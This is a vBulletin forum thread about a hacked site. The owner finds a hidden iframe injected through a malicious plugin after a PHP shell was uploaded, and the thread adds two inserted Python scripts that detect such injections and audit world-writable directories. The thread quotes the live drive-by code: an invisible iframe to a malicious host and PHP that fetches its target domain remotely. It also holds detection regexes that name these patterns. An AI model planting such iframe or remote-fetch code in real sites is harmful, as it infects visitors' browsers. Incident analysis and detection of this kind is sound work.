Code inserted into my templates.

  • DaveS
    replied
    Originally posted by wtrk:
    Were you able to remove the malicious code completely?

    Google is still calling my site malicious. I submitted a thing through the webmaster tools to have it reviewed; does anybody know how long it takes?
    Yes, I was able to remove it all completely, but it was hard work to identify.
    My site was, I think, only compromised for a few hours, so I'm sure that helped with Google not picking anything up. Checking the Webmaster Tools now, it says that it hasn't found any malware.
    However, because my server has been compromised and I can't be sure what else has been done, I'm considering a full rebuild, just to be sure.
    There's a definite lesson here in being careful in the use of 777 CHMOD'd directories! I had the attitude that it wouldn't really happen to me, as my site is relatively small with 6000 uniques per day.
    So I've learnt a lesson the hard way.


  • wtrk
    replied
    Were you able to remove the malicious code completely?

    Google is still calling my site malicious. I submitted a thing through the webmaster tools to have it reviewed; does anybody know how long it takes?
    Last edited by wtrk; Thu 25 Feb '10, 2:01pm.


  • DaveS
    replied
    I don't think it's specifically the AME product. Any of them could have been chosen in my case to hide the infection.
    I found running some SQL queries against the template or plugins table quite useful.
    So, like this:
    Code:
    SELECT * FROM vb_plugin WHERE phpcode LIKE "%$lol%";

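The LIKE search DaveS describes is the right instinct; the following Python script is an added example, not code from this thread or from vBulletin, that widens it. It builds the same kind of LIKE query with the needle properly escaped (so a search for file_get_contents does not turn underscores into wildcards), then runs a small set of indicator regexes over rows exported from the plugin, template and datastore tables: hidden 1x1 iframes, run-time remote fetches, eval/base64, and the $lol marker from this incident. The rows are constructed sample data; the table names with the vb_ prefix follow the thread's vb_plugin.phpcode, and the host attacker.invalid is a placeholder, not an indicator taken from the thread.

```python
import re

# Constructed sample rows standing in for the vBulletin tables named in the
# thread (vb_plugin.phpcode, the template table, vb_datastore). The host
# attacker.invalid is a placeholder, not an indicator taken from the thread.
SAMPLE_ROWS = [
    {"table": "vb_plugin", "title": "AME : Permission Hide",
     "body": "$domain = file_get_contents('http://attacker.invalid:21/domain/tb.txt');\n"
             "$lol = \"<iframe name=\\\"fra\\\" width=\\\"1\\\" height=\\\"1\\\" "
             "src=\\\"http://$domain/x/?id=766\\\"></iframe>\";"},
    {"table": "vb_template", "title": "footer",
     "body": "<div id=\"footer\">$vboptions[copyright]</div>\n$lol\n</body>"},
    {"table": "vb_plugin", "title": "Benign plugin",
     "body": "$show['something'] = true; // ordinary hook code"},
    {"table": "vb_template", "title": "header",
     "body": "<iframe width=\"600\" height=\"400\" src=\"/embed/video\"></iframe>"},
]

# One regex per indicator; any hit means the row needs a human look.
INDICATORS = {
    # a 1x1 or 0x0 iframe is invisible to visitors: the drive-by pattern from the thread
    "hidden_iframe": re.compile(
        r'<iframe\b[^>]*?\b(?:width|height)\s*=\s*\\?["\']?[01](?!\d)', re.I),
    # stored code that fetches its payload (or its hosting domain) from the network at run time
    "remote_fetch": re.compile(
        r'\b(?:file_get_contents|fopen|fsockopen|curl_init)\s*\(\s*[\'"]https?://', re.I),
    # eval/base64/gzinflate on stored code is nearly always obfuscation
    "eval_or_base64": re.compile(
        r'\b(?:eval|base64_decode|gzinflate|assert)\s*\(', re.I),
    # the variable name that carried the iframe in this particular incident
    "marker_var_lol": re.compile(r'\$lol\b'),
}

IFRAME_SRC = re.compile(
    r'<iframe\b[^>]*?\bsrc\s*=\s*\\?["\']?(?:https?:)?//([^/\\"\'\s>]+)', re.I)


def like_query(table, column, needle, select="*"):
    """Build the LIKE search from the thread with LIKE/quote metacharacters escaped.

    table/column are operator-supplied identifiers and are not escaped here;
    only the needle is, so '_' and '%' in it are matched literally.
    """
    escaped = (needle.replace("\\", "\\\\").replace("%", "\\%")
               .replace("_", "\\_").replace("'", "''"))
    return f"SELECT {select} FROM {table} WHERE {column} LIKE '%{escaped}%';"


def scan_row(row):
    """Return the sorted indicator names that fire on one row's stored code."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(row["body"]))


def scan_rows(rows):
    """Map (table, title) -> indicators for every row with at least one hit."""
    findings = {}
    for row in rows:
        hits = scan_row(row)
        if hits:
            findings[(row["table"], row["title"])] = hits
    return findings


def iframe_hosts(rows):
    """Collect iframe target hosts for blocklist lookups. A PHP variable such as
    $domain shows the host is resolved at run time, which is itself a red flag."""
    hosts = set()
    for row in rows:
        hosts.update(m.group(1) for m in IFRAME_SRC.finditer(row["body"]))
    return sorted(hosts)


if __name__ == "__main__":
    for needle in ("$lol", "<iframe", "file_get_contents", "base64_decode"):
        print(like_query("vb_plugin", "phpcode", needle))
    for (table, title), hits in scan_rows(SAMPLE_ROWS).items():
        print(f"{table} / {title}: {', '.join(hits)}")
    print("iframe hosts:", iframe_hosts(SAMPLE_ROWS))
```

Run the printed queries against each table that stores executable or rendered content (plugins, templates, datastore), feed the rows to scan_rows, and review every hit by hand; the marker_var_lol rule is specific to this incident and is the one to replace with whatever variable name shows up in the next one.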

  • wtrk
    replied
    I'm having the same problem. I had the AME product installed and have now removed it. I can't find any $lol in the templates, but Google Webmaster Tools shows me a bunch of threads that are infected, so I'm deleting them now one by one to see if that fixes the problem.


  • DaveS
    replied
    And found the plugin finally. The malicious code was in a plugin entitled:

    AME : Permission Hide


  • DaveS
    replied
    I've found some more information.
    I've been searching the MySQL tables and have found the following in the vb_datastore table.
    However, I'm not exactly sure what is in the datastore tables.
    I can see that there appear to be plugins.
    Can anyone help me?

    $domain = file_get_contents('http://kornoval.com:21/domain/tb.txt');
    $id = '766';
    $hash = 'a25144ea1f7195206c5f614241cd4844';
    $lol = "<iframe name=\"fra\" width=\"1\" height=\"1\" scrolling=\"no\" frameborder=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://$domain/x/?id=$id&hash=$hash\"></iframe>";


  • DaveS
    replied
    No. Thank you Lynne, any help is appreciated.
    We've just found the source. My own stupid fault.
    A very old directory with 777 permissions that was used to store pics in.
    An R57shell script was uploaded and then, it looks like, used to break the MySQL password, which was the outage earlier this morning, I assume.
    So any hacking was done via MySQL, with the template presumably edited from there.

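The root cause DaveS names, a forgotten world-writable picture directory that accepted a PHP shell, is worth auditing for across the whole web root rather than just the one folder that was found. The script below is an added example, not from the thread or from vBulletin: it walks a tree, reports every world-writable directory and lists any executable script or .htaccess inside it. build_demo_tree() builds a constructed layout with a 777 images directory holding a placeholder shell.php next to a normal 755 directory, so it runs offline; the extension list is an assumption about what a typical PHP host will execute.

```python
import os
import stat
import tempfile

# Extensions a typical PHP web host will execute (assumed list); an image
# directory should contain none of them. .htaccess is flagged too because it
# can re-enable script execution where the admin had turned it off.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".pl", ".cgi", ".sh"}
FLAGGED_NAMES = {".htaccess"}


def is_world_writable(path):
    """True when the 'other' write bit is set, as on a chmod 777 directory."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def suspicious_files(filenames):
    """Names a web server could execute, or that change how it treats the directory."""
    return sorted(f for f in filenames
                  if f in FLAGGED_NAMES or os.path.splitext(f)[1].lower() in SCRIPT_EXTS)


def audit_world_writable(root):
    """Walk root and return {directory: [suspicious file names]} for every
    world-writable directory. An empty list is still reported: the directory
    is a foothold even before anything has been dropped into it."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if is_world_writable(dirpath):
            findings[dirpath] = suspicious_files(filenames)
    return findings


def build_demo_tree():
    """Create a constructed layout mirroring the thread: an old 777 picture
    directory holding an uploaded PHP file, next to a normal 755 forum dir.
    Returns the temporary root so the audit can be run against it."""
    root = tempfile.mkdtemp(prefix="vb_audit_demo_")
    images = os.path.join(root, "images")
    forum = os.path.join(root, "forum")
    os.mkdir(images)
    os.mkdir(forum)
    for name in ("cat.jpg", "shell.php"):      # shell.php is a placeholder for the uploaded R57 shell
        open(os.path.join(images, name), "w").close()
    open(os.path.join(forum, "index.php"), "w").close()
    os.chmod(images, 0o777)                     # the mistake described in the thread
    os.chmod(forum, 0o755)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for directory, files in audit_world_writable(demo_root).items():
        print(f"world-writable: {directory}  executable content: {files or 'none yet'}")
```

On a real host, point audit_world_writable at the document root; the shell one-liner `find /path/to/webroot -type d -perm -0002` lists the same directories. The durable fix is to keep upload directories out of the executable path (or disable script execution there) rather than to rely on never forgetting a chmod.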

  • Lynne
    replied
    Sorry, I'm not an expert on this sort of thing. Perhaps someone else can come along with more specifics on what to look for.


  • DaveS
    replied
    Hi Lynne. Thank you for your reply.
    I have been looking over the various logs all day so far to see how this happened.

    Suspect file versions - yes, done the check. Nothing found.
    Access logs - yes, nothing in there.
    Looked in plugins - nothing strange there.

    So I know that the template has been edited, as taking out the added text has removed the malicious iframe code.

    I can't find the reference to $lol anywhere in vB and it must be in there somewhere.

    I think I may have been subject to an exploit, as I'm not on the very latest version of 3.8. I will do that in a mo. I was going to go straight to vB4, but I'm not ready for 4 yet.


  • Lynne
    replied
    Did you look through your access_logs? Look in your plugins? Run maintenance > diagnostics > suspect file versions and see if there is some strange file listed there.


  • DaveS
    replied
    Hi.
    Right, I now know that $lol was placed in the footer template for a couple of styles that were live.
    I assume that $lol then inserts the IFRAME code. However, I can't find anything that mentions $lol in the variables, or how it could have been done.
    So, although I've now removed $lol from the templates, I need to find out where that is and also to find out where it's happened.
    It could be that one of the Administrators has had their account hacked; I can't see anything in the control panel logs.
    The site was hammered this morning for about 2 hours, so I guess that could have been a dictionary attack trying to crack an Admin's password?
    Any help appreciated!
    Cheers
    Dave


  • DaveS
    started a topic: Code inserted into my templates.

    Hi, I wonder if I could ask for some urgent help.
    I'm running vB 3.8.
    Someone has managed to add some code to my vB implementation that is calling a nasty script.
    However, I can't see any changed PHP files or templates.
    Any ideas where I start with finding out what's happened here?

    HTML Code:
    <script type="text/javascript">
    <!--
    	// Main vBulletin Javascript Initialization
    	vBulletin_init();
    //-->
    </script>
    <iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://koren.in/x/?id=766&hash=a25144ea1f7195206c5f614241cd4844"></iframe>
    The attached source shows where the nasty iframe is getting embedded.
    Any help much appreciated.
    Thanks
    Dave